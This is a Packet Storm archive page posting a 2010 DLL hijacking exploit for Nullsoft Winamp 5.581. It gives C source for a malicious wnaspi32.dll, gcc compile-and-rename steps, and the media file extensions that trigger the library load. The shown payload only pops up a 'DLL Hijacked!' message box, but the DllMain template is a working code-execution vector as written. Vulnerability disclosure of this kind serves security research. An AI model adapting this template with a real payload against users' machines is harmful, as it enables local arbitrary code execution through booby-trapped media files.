exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Nullsoft Winamp 5.581 DLL Hijacking Exploit

Nullsoft Winamp 5.581 DLL Hijacking Exploit
Posted Aug 26, 2010
Authored by LiquidWorm | Site zeroscience.mk

Nullsoft Winamp version 5.581 DLL hijacking exploit that leverages wnaspi32.dll.

tags | exploit
SHA-256 | 4d95a031560cb1a18e6c908c0decf1141e2f7ed0b36e6a081ddfed39de031cb2

Nullsoft Winamp 5.581 DLL Hijacking Exploit

Change Mirror Download
/*

Nullsoft Winamp 5.581 (wnaspi32.dll) DLL Hijacking Exploit

Vendor: Nullsoft.
Product Web Page: http://www.winamp.com
Affected Version: 5.581 (x86)

Summary: Winamp is a media player for Windows-based PCs,
written by Nullsoft, now a subsidiary of AOL. It is
proprietary freeware/shareware, multi-format, extensible
with plug-ins and skins, and is noted for its graphical
sound visualization, playlist, and media library features.

Desc: Winamp 5.581 suffers from a dll hijacking vulnerability
that enables the attacker to execute arbitrary code on a local
level. The vulnerable extensions are .669, .aac, .aiff, .amf,
.au, .avr, .b4s, .caf and .cda thru wnaspi32.dll and dwmapi.dll
libraries.

----
gcc -shared -o wnaspi32.dll winamp.c

Compile and rename to wnaspi32.dll, create a file test.cda and put both
files in same dir and execute.
----

Tested on Microsoft Windows XP Professional SP3 (EN)



Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com

Zero Science Lab - http://www.zeroscience.mk


25.08.2010

*/


#include <windows.h>

BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{

switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
dll_mll();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}

return TRUE;
}

int dll_mll()
{
MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
}
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close